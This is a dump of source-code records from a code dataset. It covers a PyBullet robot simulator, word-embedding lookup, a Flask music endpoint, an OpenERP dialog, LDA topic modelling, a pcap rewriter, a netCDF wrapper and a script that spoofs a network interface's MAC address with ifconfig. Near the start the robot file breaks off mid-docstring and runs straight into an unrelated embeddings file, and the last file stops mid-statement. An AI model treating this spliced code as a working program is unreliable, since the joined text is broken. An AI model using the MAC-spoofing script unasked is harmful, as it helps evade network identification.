baseOrientation=robotConfigs[\"robotStartOrientation\"],\n useFixedBase=robotFixedBase,\n # flags = (self.p.URDF_USE_SELF_COLLISION\n # + self.p.URDF_USE_INERTIA_FROM_FILE),\n )\n\n # loading robot PID configs\n self.ctrlConfig = yaml.load(\n open(self.robotConfigs[\"robotPIDConfigs\"]), Loader=yaml.FullLoader)\n\n # Setting frictions parameters to default ones\n self.setFloorFrictions()\n\n # Initialize joints and frames\n self.frames = {}\n self.noJoints = 0\n self.joints = []\n self.jointIds = {}\n self.jointsInfos = {}\n self.jointControllers = {}\n self.jointControlType = {}\n self.jointTorques = {}\n self.jointMaxTorques = {}\n self.jointTargetPos = {}\n self.jointPositionOld = {}\n self.jointTargetVels = {}\n self.jointIntegrals = {}\n self.jointGravCompensation = {}\n\n self.robotLimbs = [\n [\"LARM_JOINT0\", \"LARM_JOINT1\", \"LARM_JOINT2\",\n \"LARM_JOINT3\", \"LARM_JOINT4\", \"LARM_JOINT5\"],\n [\"RARM_JOINT0\", \"RARM_JOINT1\", \"RARM_JOINT2\",\n \"RARM_JOINT3\", \"RARM_JOINT4\", \"RARM_JOINT5\"],\n [\"HEAD_JOINT0\", \"HEAD_JOINT1\"]\n ]\n\n self.colorPalettes = {\n \"lightOrange\": [1.0, 0.82, 0.12, 1.0],\n \"darkOrange\": [1.0, 0.6, 0.0, 1.0],\n \"darkGrey\": [0.43, 0.43, 0.43, 1.0],\n \"lightGrey\": [0.65, 0.65, 0.65, 1.0],\n }\n\n # Initiallizing joint infos\n n = 0\n for k in range(self.p.getNumJoints(self.robot)):\n jointInfo = self.p.getJointInfo(self.robot, k)\n jointName = jointInfo[1].decode('utf-8')\n\n if not jointName.endswith('_fixing') and not jointName.endswith('_passive'):\n if '_frame' in jointName:\n self.frames[jointName] = k\n else:\n self.joints.append(jointName)\n self.jointIds[jointName] = n\n n += 1\n\n self.jointsInfos[jointName] = {\n 'type': jointInfo[2]\n }\n if jointInfo[8] < jointInfo[9]:\n self.jointsInfos[jointName]['lowerLimit'] = jointInfo[8]\n self.jointsInfos[jointName]['upperLimit'] = jointInfo[9]\n else:\n # default value\n self.jointsInfos[jointName]['lowerLimit'] = -2.0\n # default value\n self.jointsInfos[jointName]['upperLimit'] = 2.0\n self.jointsInfos[jointName]['restPos'] = self.getJointPos(\n jointName)\n # default value\n self.jointsInfos[jointName]['jointRange'] = 2.0\n\n if re.match('(base|BASE)', jointName):\n self.jointControllers[jointName] = \"SKIP_THIS_JOINT\"\n else:\n self.jointControllers[jointName] = jointName + \\\n \"_position_controller\"\n self.jointControlType[jointName] = \"velocity\"\n self.jointTorques[jointName] = 0.0\n self.jointTargetPos[jointName] = 0.0\n self.jointPositionOld[jointName] = 0.0\n self.jointTargetVels[jointName] = 0.0\n self.jointIntegrals[jointName] = 0.0\n self.jointGravCompensation[jointName] = 0.0\n\n self.noJoints = len(self.jointIds)\n\n # Initializing debug lines\n self.initialiseDebugLines()\n # Robot color scheme, modify as you wish\n self.robotColorPreset = {\n 'base_to_waist': \"darkGrey\",\n 'CHEST_JOINT0': \"lightGrey\",\n 'HEAD_JOINT0': \"darkOrange\",\n 'HEAD_JOINT1': \"lightOrange\",\n 'LARM_JOINT0': \"darkOrange\",\n 'LARM_JOINT1': \"lightOrange\",\n 'LARM_JOINT2': \"darkOrange\",\n 'LARM_JOINT3': \"lightOrange\",\n 'LARM_JOINT4': \"darkOrange\",\n 'LARM_JOINT5': \"lightOrange\",\n 'RARM_JOINT0': \"darkOrange\",\n 'RARM_JOINT1': \"lightOrange\",\n 'RARM_JOINT2': \"darkOrange\",\n 'RARM_JOINT3': \"lightOrange\",\n 'RARM_JOINT4': \"darkOrange\",\n 'RARM_JOINT5': \"lightOrange\"\n }\n # Apply colors if required\n if robotConfigs['colored']:\n for joint in self.robotColorPreset:\n self.p.resetVisualShapeData(\n self.robot, self.jointIds[joint], \n rgbaColor=self.colorPalettes[self.robotColorPreset[joint]])\n\n # Finishing up and show no of joints\n print('[Simulation] Found '+str(len(self.jointIds))+' DOFs')\n\n ########## Destructor ##########\n def __del__(self):\n self.p.disconnect()\n time.sleep(1)\n print(f'[Simulation] Leaving')\n\n ########## Setting up tools ##########\n def setFloorFrictions(self, lateral=1, spinning=-1, rolling=-1):\n \"\"\"Sets the frictions with the plane object\n\n Keyword Arguments:\n lateral (float) -- lateral friction (default: {1.0})\n spinning (float) -- spinning friction (default: {-1.0})\n rolling (float) -- rolling friction (default: {-1.0})\n \"\"\"\n if self.floor is not None:\n self.p.changeDynamics(self.floor, -1, lateralFriction=lateral,\n spinningFriction=spinning, rollingFriction=rolling)\n\n def resetJointIntegrals(self):\n \"\"\"Reset the integral value of every joint\"\"\"\n for joint in self.joints:\n self.jointIntegrals[joint] = 0.0\n\n def debugCameralookAt(self, target):\n \"\"\"Make the debug camera loot at a point\n\n Arguments:\n target (tuple) -- target as (x,y,z) tuple\n \"\"\"\n if self.gui:\n params = self.p.getDebugVisualizerCamera()\n self.p.resetDebugVisualizerCamera(\n params[10], params[8], params[9], target)\n\n def changeLinkColor(self, jointName, color):\n \"\"\"Change a link's color and opacity\n\n Arguments:\n jointName (str) -- the joint name\n color [4 float] -- (r,g,b,a) for RGB and opacity from 0 to 1\n \"\"\"\n self.p.changeVisualShape(\n self.robot, self.jointIds[jointName], rgbaColor=color)\n\n def resetAllLinkColor(self, color=[1, 1, 1, 1]):\n \"\"\"Reset all link's color\n\n Keyword Arguments:\n color [4 floats] -- [1,1,1,1] white color by default\n \"\"\"\n for i in range(self.noJoints):\n self.p.changeVisualShape(self.robot, i, rgbaColor=[1, 1, 1, 1])\n\n def initialiseDebugLines(self):\n \"\"\"Initialise debug lines\"\"\"\n self.lines = []\n self.currentLine = 0\n self.lastLinesDraw = 0\n self.lineColors = [[1, 0, 0], [0, 1, 0], [\n 0, 0, 1], [1, 1, 0], [1, 0, 1], [0, 1, 1]]\n\n def initGravCompensation(self):\n \"\"\"Initialise the gravity compensation\"\"\"\n for link in self.joints:\n self.jointGravCompensation[link] = 0.0\n\n def addDebugPosition(self, position, color=None, duration=30):\n \"\"\"Adds a debug position to be drawn as a line\n\n Arguments:\n position (tuple) -- (x,y,z)\n\n Keyword Arguments:\n color (tuple) -- (r,g,b) (0->1) (default: {None})\n duration (float) -- line duration on screen before disapearing (default: {30})\n \"\"\"\n if color is None:\n color = self.lineColors[self.currentLine]\n\n if self.currentLine >= len(self.lines):\n self.lines.append({})\n\n self.lines[self.currentLine]['update'] = True\n self.lines[self.currentLine]['to'] = position\n self.lines[self.currentLine]['color'] = color\n self.lines[self.currentLine]['duration'] = duration\n\n self.currentLine = (self.currentLine + 1) % len(self.lineColors)\n\n def drawDebugLines(self):\n \"\"\"Draw debug lines\"\"\"\n self.currentLine = 0\n if time.time() - self.lastLinesDraw > 0.05:\n for line in self.lines:\n if 'from' in line:\n if line['update'] == True:\n self.p.addUserDebugLine(\n line['from'], line['to'], line['color'], 2, line['duration'])\n line['update'] = False\n else:\n del line['from']\n line['from'] = line['to']\n\n self.lastLinesDraw = time.time()\n\n def setBallPos(self, ball, position):\n \"\"\"Sets the ball position on the field\n\n Arguments:\n ball (int) -- unique id of the ball\n position (tuple of 3 floats) -- position of the ball\n \"\"\"\n if ball is not None:\n # Putting the ball on the ground at given position\n x, y, z = position\n self.p.resetBasePositionAndOrientation(\n ball, [x, y, z], self.p.getQuaternionFromEuler([0, 0, 0]))\n # Hover the ball if not using fixed base under gravity\n self.p.changeDynamics(ball, 0, linearDamping=0, angularDamping=0.1)\n\n def getCameraStatus(self):\n \"\"\"Returns: tuple -- camera status\"\"\"\n return self.p.getDebugVisualizerCamera()\n\n def getCamPosProcessed(self):\n \"\"\"Returns: tuple -- (camera position, camera focus position)\"\"\"\n # distance, yaw, pitch, tarPos, clientid(optional if you have multiple clients)\n config = self.getCameraStatus()\n config = config[10], config[8], config[9], config[11]\n camPos = list(map(lambda x: float(f'{x:.2f}'), config[:3]))\n camTar = list(map(lambda x: float(f'{x:.2f}'), config[3]))\n return (*camPos, tuple(camTar))\n\n def closeClient(self):\n \"\"\"Disconnect the Pybullet Simulator\"\"\"\n self.p.disconnect()\n\n ########## Robot Configs & Status ##########\n \n def getRobotPose(self, robot=None):\n \"\"\"Gets the robot (origin) position\n\n Returns:\n (tuple(3), tuple(3)) -- (x,y,z), (roll, pitch, yaw)\n \"\"\"\n if robot is None:\n robot = self.robot\n pose = self.p.getBasePositionAndOrientation(robot)\n return (pose[0], self.p.getEulerFromQuaternion(pose[1]))\n\n def setRobotPose(self, pos, orn, robot=None):\n \"\"\"Sets the robot (origin) pose\n\n Arguments:\n pos {tuple} -- (x,y,z) position\n orn {tuple} -- (x,y,z,w) quaternions\n \"\"\"\n if robot is None:\n robot = self.robot\n self.p.resetBasePositionAndOrientation(robot, pos, orn)\n\n def autoCollisions(self):\n \"\"\"Returns the total amount of N in autocollisions (not with ground)\n\n Returns:\n float -- Newtons of collisions not with ground\n \"\"\"\n total = 0\n for k in range(1, self.noJoints):\n contacts = self.p.getContactPoints(bodyA=k)\n for contact in contacts:\n if contact[2] != self.floor:\n total += contact[9]\n return total\n\n def disableRobotCollisions(self):\n \"\"\"Disable self collision of the robot\"\"\"\n for i in range(-1, self.noJoints):\n for j in range(-1, self.noJoints):\n self.p.setCollisionFilterPair(self.robot, self.robot, i, j, 0)\n\n def disableRobotBallCollision(self, ball):\n \"\"\"Disable collision between the robot and a ball\n \n Keyword Arguments:\n ball (int) -- the unique id of the ball\n \"\"\"\n for i in range(-1, self.noJoints):\n self.p.setCollisionFilterPair(self.robot, ball, i, -1, 0)\n\n def contactPoints(self):\n \"\"\"Gets all contact points and forces\n \n Returns:\n list -- list of entries (link_name, position in m, force in N)\n \"\"\"\n result = []\n contacts = self.p.getContactPoints(bodyA=self.floor, bodyB=self.robot)\n for contact in contacts:\n link_index = contact[4]\n if link_index >= 0:\n link_name = (self.p.getJointInfo(\n self.robot, link_index)[12]).decode()\n else:\n link_name = 'base'\n result.append((link_name, contact[6], contact[9]))\n\n return result\n\n ########## Joint Status and Controls ##########\n\n def showJoints(self):\n \"\"\"Display the details of joionts of the robot\"\"\"\n print('Joints:')\n for i, j in enumerate(self.joints):\n print(f'joint {i}: {j}')\n\n def getJointInfo(self, jointName):\n \"\"\"Get informations about a joint\n \n Return: list -- \n No Parameter Type Description \n [0] jointIndex int the same joint index as the input parameter \n [1] jointName string the name of the joint, as specified in the URDF (or SDF etc) file\n [2] jointType int type of the joint, this also implies the number of position and velocity variables. JOINT_REVOLUTE, JOINT_PRISMATIC, JOINT_SPHERICAL, JOINT_PLANAR, JOINT_FIXED. See the section on Base, Joint and Links for more details.\n [3] qIndex int the first position index in the positional state variables for this body\n [4] uIndex int the first velocity index in the velocity state variables for this body\n [5] flags int reserved\n [6] jointDamping float the joint damping value, as specified in the URDF file\n [7] jointFriction float the joint friction value, as specified in the URDF file\n [8] jointLowerLimit float Positional lower limit for slider and revolute (hinge) joints.\n [9] jointUpperLimit float Positional upper limit for slider and revolute joints. Values ignored in case upper limit dev_word_limit and dev_word_limit > 0): break;\n else:\n lines = file.readlines();\n\n ## build dictionary\n for index, line in enumerate(lines):\n result = extract_word_and_vector_from_line(line);\n this_word = result[0];\n this_vector = result[1];\n embedding_dictionary[this_word] = this_vector;\n if(index % 10000 == 0): print(\"At wordvector \" + str(index));\n\n ## return dictionary\n return embedding_dictionary;\n\nnot_found_set = set();\ndef find_word_vector(word):\n if(word == \"$PURPOSEFULL-SKIP-KEY$\"): return False;\n\n global not_found_set;\n global vector_source;\n global bool_load_into_ram;\n global embedding_dictionary;\n if bool_load_into_ram:\n if(embedding_dictionary == False):\n print(\"Loading embeddings dictionary\");\n embedding_dictionary = return_embedding_dictionary(vector_source)\n if word in embedding_dictionary:\n return embedding_dictionary[word];\n else:\n not_found_set.add(word);\n return False;\n\n else:\n with open(vector_source) as file:\n index = -1;\n for line in file:\n index += 1;\n result = extract_word_and_vector_from_line(line);\n this_word = result[0];\n this_vector = result[1];\n\n if(word == this_word):\n return this_vector;\n\n if(index > 100000):\n not_found_set.add(word);\n #print(\"could not find word \" + word);\n return False; ## giveup here for testing speed's sake\n\n\n return vector;\n\ndef calculate_cosine_similarity_between_vectors(vec_a, vec_b):\n '''\n A dot B = |A||B|cosine(theta)\n return cosine(theta)\n '''\n if(len(vec_a) != len(vec_b)):\n print(\"Length of Vector A and Vector B are not equal \\n \");\n return -1;\n cos = np.dot(vec_a, vec_b) / (np.linalg.norm(vec_a) * np.linalg.norm(vec_b))\n return cos;\n\ndef similarity_between_words(word_a, word_b):\n word_a = re.sub(r'[^a-zA-Z]', '', word_a) # remove nonalphanumberic\n word_b = re.sub(r'[^a-zA-Z]', '', word_b) # remove nonalphanumberic\n\n vector_a = find_word_vector(word_a);\n vector_b = find_word_vector(word_b);\n if(vector_a == False or vector_b == False): return False;\n return calculate_cosine_similarity_between_vectors(vector_a, vector_b);\n","sub_path":"feature_engineering/utilities/embeddings/google_embeddings_interface.py","file_name":"google_embeddings_interface.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"109479588","text":"import datetime\n\nfrom flask import request, jsonify\n\nfrom app.api.v1.song import song\nfrom app.model.res import Res\nfrom app.utils.common_utils import get_date_now, serialize\nfrom app.utils.song.download.netease_music import get_song_by_text\n\n\n@song.route('/netease/download', methods=['POST'])\ndef netease_download():\n text = request.form['text']\n\n start = datetime.datetime.now()\n\n song = get_song_by_text(text)\n\n end = datetime.datetime.now()\n\n if song is not None:\n # if song.id > 0:\n status = 200\n msg = '音乐获取成功'\n info = {\n 'text': text,\n 'song': serialize(song),\n 'created_time': get_date_now(),\n 'finish_time': (end - start).seconds\n }\n\n res_json = Res(status, msg, info)\n\n return jsonify(res_json.__dict__)\n\n else:\n status = 404\n msg = '未找到资源,请联系管理员'\n info = [\n {\n 'text': text,\n 'song': '',\n 'created_time': get_date_now(),\n 'finish_time': (end - start).seconds\n }\n ]\n\n res_json = Res(status, msg, info)\n\n return jsonify(res_json.__dict__)\n","sub_path":"app/api/v1/song/netease_song.py","file_name":"netease_song.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"102499730","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\t\n# Copyright (C) 2004-2009 Tiny SPRL (). All Rights Reserved\n# $Id$\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nimport gettext\n\nimport gtk\nfrom gtk import glade\nimport common\nimport service\nimport rpc\n\ndef field_pref_set(field, name, model, value, dependance=None, window=None):\n win_gl = glade.XML(common.terp_path('openerp.glade'), 'win_field_pref',\n gettext.textdomain())\n if dependance is None:\n dependance = []\n if window is None:\n window = service.LocalService('gui.main').window\n win = win_gl.get_widget('win_field_pref')\n win.set_transient_for(window)\n win.set_icon(common.OPENERP_ICON)\n ent = win_gl.get_widget('ent_field')\n ent.set_text(name)\n ent = win_gl.get_widget('ent_domain')\n ent.set_text(model)\n ent = win_gl.get_widget('ent_value')\n ent.set_text((value and str(value)) or '/')\n\n radio = win_gl.get_widget('radio_user_pref')\n\n vbox = win_gl.get_widget('pref_vbox')\n widgets = {}\n addwidget = False\n for (fname,fvalue,rname,rvalue) in dependance:\n if rvalue:\n addwidget = True\n widget = gtk.CheckButton(fname+' = '+str(rname))\n widgets[(fvalue,rvalue)] = widget\n vbox.pack_start(widget)\n if not len(dependance) or not addwidget:\n vbox.pack_start(gtk.Label(_('Always applicable !')))\n vbox.show_all()\n\n res = win.run()\n\n deps = False\n for nv in widgets.keys():\n if widgets[nv].get_active():\n deps = nv[0]+'='+str(nv[1])\n break\n window.present()\n win.destroy()\n if res==gtk.RESPONSE_OK:\n rpc.session.rpc_exec_auth('/object', 'execute', 'ir.values', 'set', 'default', deps, field, [(model,False)], value, True, False, False, radio.get_active(), True)\n return True\n return False\n\n\n\n","sub_path":"bin/widget/view/form_gtk/wid_common.py","file_name":"wid_common.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"383210686","text":"# merge-k-sorted-lists\n\nimport heapq\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def mergeKLists(self, lists):\n root = res = ListNode(None)\n heap = []\n\n # 각 연결 리스트의 루트를 힙에 저장\n for i in range(len(lists)):\n if lists[i]:\n # 동일한 값을 넣을 수 없으므로 추가 인자로 연결 리스트의 순서를 같이 삽입함\n heapq.heappush(heap, (lists[i].val, i, lists[i]))\n\n # 힙 추출 이후 다음 노드는 다시 저장\n while heap:\n node = heapq.heappop(heap)\n idx = node[1]\n res.next = node[2]\n\n res = res.next\n if res.next:\n heapq.heappush(heap, (res.next.val, idx, res.next))\n\n return root.next\n\n\n# PriorityQueue vs heapq\n# 둘은 사실상 동일함\n# PriorityQueue : Thread-Safe 보장\n# heapq : Thread-Safe 보장하지 않음\n# 멀티 스레드로 구현하지 않는다면 굳이 PriorityQueue 사용하지 않아도 됨\n","sub_path":"python-algorithm-interview/3_linear_data_structures/10_deque/27-1.py","file_name":"27-1.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"162296307","text":"#!/usr/bin/env python\n\nimport subprocess\nimport optparse\nimport re\n\ndef get_arguements():\n parser = optparse.OptionParser()\n parser.add_option(\"-i\", \"--interface\", dest=\"interface\", help=\"Interface whose MAC to change\")\n parser.add_option(\"-m\", \"--mac\", dest=\"new_mac\", help=\"New MAC Address \")\n (options, arguements) = parser.parse_args()\n if not options.interface:\n parser.error(\"[-] Please enter the interface. Use --help for help menu.\")\n elif not options.new_mac:\n parser.error(\"[-] Please enter the new mac. Use --help for help menu.\")\n return options\n\ndef change_mac(interface,new_mac):\n print(\"[+] Changing mac address of interface \" + interface + \" to \" + new_mac)\n subprocess.call([\"ifconfig\", interface, \"down\"]) # more secure as the value of variable cannot be hijacked.\n subprocess.call([\"ifconfig\", interface, \"hw\", \"ether\", new_mac])\n subprocess.call([\"ifconfig\", interface, \"up\"])\n\ndef get_current_mac(interface):\n ifconfig_result = subprocess.check_output([\"ifconfig\", interface])\n mac_search_result = re.search(r\"\\w\\w:\\w\\w:\\w\\w:\\w\\w:\\w\\w:\\w\\w\", ifconfig_result)\n if mac_search_result:\n return mac_search_result.group(0)\n # print(mac_search_result.group(0))\n else:\n print(\"[-] This interface does not have a mac address\")\n\noptions = get_arguements()\nmac = get_current_mac(options.interface)\nprint(\"[+] Current MAC is \"+str(mac))\nchange_mac(options.interface,options.new_mac)\nmac = get_current_mac(options.interface)\nif mac == options.new_mac:\n print(\"[+] MAC has been successfully updated to \"+mac)\nelse:\n print(\"[-] Failed to update MAC\")\n\n\n\n#options = get_arguements()\n# change_mac(options.interface,options.new_mac)\n# if mac_search_result == options.new_mac:\n# print(\"[+] MAC changed successfully\")\n# else:\n# print(\"[-] Could not change MAC\")\n#interface=raw_input(\"[+] Enter interface to change mac for > \")\n#new_mac=raw_input(\"[+] Enter new mac > \")\n# subprocess.call(\"ifconfig \"+interface+\" down\", shell=True)\n# subprocess.call(\"ifconfig \"+interface+\" hw ether \"+new_mac, shell=True)\n# subprocess.call(\"ifconfig \"+interface+\" up\", shell=True)\n\n","sub_path":"mac_changer.py","file_name":"mac_changer.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"223905562","text":"#\n# Copyright (c) 2020 Russell Smiley\n#\n# This file is part of build_harness.\n#\n# You should have received a copy of the MIT License along with build_harness.\n# If not, see .\n#\n# https://gitlab.com/ci-cd-devops/build_harness/-/blob/main/build_harness/_utility.py\n\n\"\"\"General support for build harness implementation.\"\"\"\n\nimport logging\nimport subprocess\nimport typing\n\nlog = logging.getLogger(__name__)\n\nCommandArgs = typing.List[str]\n\n\ndef run_command(\n command: CommandArgs, **kwargs: typing.Any\n) -> subprocess.CompletedProcess:\n \"\"\"\n Run a system command using ``subprocess.run``.\n\n Args:\n command: List of command and arguments.\n **kwargs: Optional arguments passed through to ``subprocess.run``.\n\n Returns:\n Subprocess results.\n \"\"\"\n log.debug(\"command to run, {0}\".format(str(command)))\n log.debug(\"command arguments, {0}\".format(str(kwargs)))\n result = subprocess.run(command, **kwargs)\n\n return result\n","sub_path":"foodx_devops_tools/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"426530740","text":"# Rewrite destination MAC address with timestamp (in microsec)\n# Change actual timestamp to (UNIX epoch + 0.001 * frame no.) sec\n# Usage: python3 rewrite-pcaps.py smallFlows.pcap\n\nimport sys\nfrom pypacker import ppcap\nfrom pypacker.layer12 import ethernet\n\npreader = ppcap.Reader(filename=sys.argv[1])\npwriter = ppcap.Writer(filename=sys.argv[1] + \".rewritten.pcap\")\n\nfor ts_nano, buf in preader:\n eth = ethernet.Ethernet(buf)\n ts_micro = int(ts_nano / 1000) % 281474976710655\n ts_micro_hex = (ts_micro).to_bytes(6, \"big\").hex()\n eth.dst_s = ts_micro_hex\n pwriter.write(eth.bin())\n\npwriter.close()","sub_path":"src/rewrite-pcaps.py","file_name":"rewrite-pcaps.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"19787095","text":"import pickle\nfrom gensim import corpora, models, similarities\nimport gensim\nimport math\nimport csv\nimport numpy as np\n\nfrom gensim.corpora.dictionary import Dictionary\nfrom gensim.models import LdaModel\nfrom collections import defaultdict\n\nimport pandas as pd\nimport itertools\n\nfrom tqdm import tqdm\nimport matplotlib\nimport matplotlib.pylab as plt\nimport json\nfrom wordcloud import WordCloud\n\nimport logging\n\n\ndf = pd.read_csv('syllabus_globun.csv', usecols=[0])\nclass_names = df.values.tolist()\nclass_names = list(itertools.chain.from_iterable(class_names))\n\nf = open(\"theme_words.csv\", \"r\")\nreader = csv.reader(f)\ntexts = [e for e in reader]\nf.close()\n\ndictionary = corpora.Dictionary(texts)\nprint(dictionary)\n# make corpus\ncorpus = [dictionary.doc2bow(t) for t in texts]\n\n\n# tfidf\ntfidf = gensim.models.TfidfModel(corpus)\n\n\n# make corpus_tfidf\ncorpus_tfidf = tfidf[corpus]\n\nNUM_TOPICS = 6\n\n# LDA Model\n# logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\nlda_model = gensim.models.ldamodel.LdaModel(corpus=corpus_tfidf, id2word=dictionary, num_topics=NUM_TOPICS, alpha='symmetric', random_state=0)\n\n# test\nN = sum(count for doc in corpus for id, count in doc)\nprint(\"N: \",N)\n\nperplexity = np.exp2(-lda_model.log_perplexity(corpus))\nprint(\"perplexity:\", perplexity)\n\n# テストデータをモデルに掛ける\ntest_corpus = [dictionary.doc2bow(text) for text in texts]\n\ntopic_results = []\n# クラスタリング結果を出力\nfor unseen_doc in test_corpus:\n score_by_topic = [0] * NUM_TOPICS\n for topic, score in lda_model[unseen_doc]:\n score_by_topic[topic] = score\n topic_results.append(score_by_topic)\nfrom pprint import pprint\n\ndf = pd.read_csv('syllabus_globun.csv')\ndf['トピックの確率'] = topic_results\n\nnp.random.seed(0)\nFONT = \"/Library/Fonts/Arial Unicode.ttf\"\n\nncols = math.ceil(NUM_TOPICS/2)\nnrows = math.ceil(lda_model.num_topics/ncols)\nfig, axs = plt.subplots(ncols=ncols, nrows=nrows, figsize=(15,7))\naxs = axs.flatten()\n\ndef color_func(word, font_size, position, orientation, random_state, font_path):\n return 'black'\n\nfor i, t in enumerate(range(lda_model.num_topics)):\n\n x = dict(lda_model.show_topic(t, 30))\n im = WordCloud(\n font_path=FONT,\n background_color='white',\n color_func=color_func,\n random_state=0\n ).generate_from_frequencies(x)\n axs[i].imshow(im)\n axs[i].axis('off')\n axs[i].set_title('Topic '+str(t))\n\nplt.tight_layout()\nplt.savefig(f'visualize_{NUM_TOPICS}.png')\nplt.show()\n","sub_path":"test_reccomendation.py","file_name":"test_reccomendation.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"99332022","text":"import datetime\nfrom dictionary import Dict\nfrom logger import logger\n\nclass Cache:\n live=Dict()\n status=\"empty\"\n lastrefresh=\"\"\n # Cache Supported Variables\n logger = logger()\n cache=False\n\n def __init__(self,firebase_data=False):\n if(firebase_data==False):\n self.loadLocalCache()\n else:\n self.loadFromDict(firebase_data)\n \n def loadFromDict(self,firebase_data):\n self.live = Dict(firebase_data)\n\n def loadLocalCache(self,path=\"config/firebase_cache.json\"):\n try:\n \n self.cache = open(path,\"r\")\n data = Dict().loadJSON(path)\n self.logger.log(\"Loading Local Cache\")\n self.live = data\n # self.logger.log(\"Local Cache : \"+str(data.val()))\n self.cache.close()\n return True\n except:\n return False\n \n def storeLocalCache(self,path=\"config/firebase_cache.json\"):\n self.cache = open(path,\"w\")\n self.cache.write(self.live.toJSON())\n self.cache.close()\n self.logger.log(\"Flushing Cache to File\")\n \n def lastRefresh(self):\n self.lastrefresh = datetime.datetime.now().strftime(\"%d/%m/%y %H:%M\")\n\n def refresh(self,firebase_data):\n if(firebase_data==False):\n self.loadLocalCache()\n return\n else:\n self.live = Dict(firebase_data)\n self.lastrefresh = datetime.datetime.now().strftime(\"%d/%m/%y %H:%M\")\n self.status = \"loaded\"\n self.storeLocalCache()\n\n def update(self,path,value):\n self.live.updateValueAt(path,value)\n self.logger.log(\"Cache Updated @ - \"+path)\n \n def read(self,path):\n # print(path)\n return self.live.readValueAt(path)","sub_path":"cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"479818548","text":"# Simple reproduction of the gridded I/O API for netCDF\n# This is mostly an abstraction layer of NCF functions built to work with gridded I/O API data.\n# This module is in no way connected to the I/O API project or developers. Please do not contact the developers of I/O API about this or any files generated by this script.\n# Requires netCDF4 python module\n\nfrom __future__ import print_function\nfrom builtins import str\nfrom builtins import range\nfrom builtins import object\nimport numpy as np\nimport netCDF4 as ncf\nimport time\nfrom datetime import datetime, timedelta\n\nclass IOVar(ncf.Variable):\n '''\n Grid variable\n '''\n def __init__(self, ds, vname, dtype, dims, **kwargs):\n '''\n Variable Name\n Dtype : INT, REAL or DBLE\n Dimensions: ie ['TSTEP','LAY','ROW','COL']\n Keyword arguments to set attributes: long_name, units or var_desc \n '''\n ioapi_dtypes = {'INT': np.int32, 'REAL': np.float32, 'DBLE': np.float64}\n np_dtype = ioapi_dtypes[dtype] \n ncf.Variable.__init__(self, ds, vname, np_dtype, dims)\n self.long_name = vname.ljust(80)\n self.units = ''.ljust(80)\n self.var_desc = ''.ljust(80)\n for att, val in list(kwargs.items()):\n if att in ('long_name','units','var_desc'):\n setattr(self, att, val)\n\nclass IODataset(ncf.Dataset):\n '''\n General dataset\n '''\n def __init__(self, fname, mode='r'):\n ncf.Dataset.__init__(self, fname, mode, format='NETCDF3_CLASSIC')\n\n def create_variable(self, vname, dtype, dims, **kwargs):\n '''\n Create an IOAPI variable for this DS\n '''\n new_var = IOVar(self, vname, dtype, dims, **kwargs)\n self.variables[vname] = new_var\n self.sync()\n return new_var\n\n def set_dimensions(self, ftype='GRID', **kwargs):\n '''\n Set the file dimensions\n Override default dimension values with keyword arugments.\n Use None (nonetype) for Unlimited\n '''\n if ftype == 'GRID':\n dim_list = ('TSTEP','LAY','ROW','COL','VAR')\n elif ftype == 'BOUNDARY':\n # SIZE = ABS(NTHIK)*(2*NCOLS + 2*NROWS + 4*NTHIK)\n dim_list = ('SIZE','NLAYS','NVARS')\n else:\n raise ValueError('Unknown IO filetype. GRID only type currently supported.')\n for dim, val in list(kwargs.items()):\n if dim in dim_list:\n self.createDimension(dim, val)\n if 'TSTEP' not in list(kwargs.keys()):\n self.createDimension('TSTEP', None)\n self.createDimension('DATE-TIME', 2)\n self.init_tflag()\n\n def init_tflag(self):\n '''\n Have to init the TFLAG variable at the beginning so that TFLAG is firest variable \n '''\n tflag = self.create_variable('TFLAG', 'INT', ('TSTEP','VAR','DATE-TIME'),\n long_name='TFLAG',\n units='',\n var_desc='Timestep-valid flags: (1) YYYYDDD or (2) HHMMSS')\n\n def set_attributes(self, sdate, grid, **kwargs):\n '''\n Set the attributes. Auto set GDNAM, the grid parameters,\n NVARS, VAR-LIST, FTYPE, IOAPI_VERSION, EXEC_ID, CDATE, CTIME,\n UPNAM, FILEDESC, and HISTORY as fixed/auto-generated.\n SDATE and GDNAM are set in the arguments.\n Default and auto set:\n STIME, TSTEP, NLAYS, VGTYP, VGTOP, VGLVLS\n '''\n # Set grid-based attributes from grid desc\n for att in grid.grid_atts:\n if att == 'GDNAM':\n val = grid.GDNAM.ljust(16)\n else:\n val = getattr(grid, att)\n setattr(self, att, val)\n var_list = [var for var in self.variables if var != 'TFLAG']\n self.NVARS = 